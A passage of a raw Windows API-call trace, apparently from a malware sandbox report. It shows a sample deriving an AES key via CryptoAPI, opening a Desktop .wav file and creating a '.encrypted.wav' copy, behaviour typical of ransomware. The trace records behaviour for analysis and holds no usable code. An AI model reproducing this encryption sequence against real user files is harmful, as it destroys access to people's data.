wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.448] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.448] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0032.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0032.448] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.448] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0032.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0032.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a30 | out: hHeap=0x770000) returned 1 [0032.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0032.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0032.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0032.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0032.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0032.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0032.448] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0032.448] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0032.448] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.448] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0032.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0032.449] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.449] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0032.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0032.449] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.449] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.449] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.449] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.449] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0032.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0032.449] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.449] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.449] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0032.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0032.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0032.449] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.449] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0032.449] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0032.449] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0032.449] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.449] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0032.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0032.449] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.449] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0032.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0032.450] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.450] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.450] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.450] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0032.450] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.450] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0032.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0032.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0032.450] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.450] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.450] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0032.450] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.450] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0032.450] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.450] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.450] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0032.450] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.450] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.450] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0032.450] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.451] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.451] CryptHashData (hHash=0x7c2240, pbData=0x7c75d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0032.451] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.451] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0032.451] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.451] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0032.451] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.451] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0032.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0032.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0032.451] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.451] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.451] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0032.451] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.451] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c22c0 | out: hHeap=0x770000) returned 1 [0032.451] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.451] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.451] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.451] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0032.451] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0032.451] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.451] CryptDestroyHash (hHash=0x7c2240) returned 1 [0032.452] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.452] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.452] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0032.452] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0032.452] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.452] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_WgswrxrAQIdMFU5.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_wgswrxraqidmfu5.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0032.452] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0032.452] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0032.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0032.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0032.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0032.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0032.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0032.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0032.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0032.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0032.452] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0032.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0032.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0032.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0032.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0032.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0032.452] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0032.452] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0032.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0032.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0032.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0032.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0032.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0032.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0032.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0032.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0032.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0032.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0032.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0032.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0032.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0032.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0032.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0032.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0032.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0032.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0032.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0032.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0032.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0032.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0032.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0032.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0032.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0032.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0032.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0032.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0032.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0032.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0032.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0032.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0032.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0032.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0032.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0032.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0032.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0032.454] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0032.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0032.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0032.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0032.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0032.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0032.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x935008 [0032.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0032.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0032.455] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_WgswrxrAQIdMFU5.encrypted.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_wgswrxraqidmfu5.encrypted.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0032.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0032.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0032.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0032.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0032.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0032.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0032.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 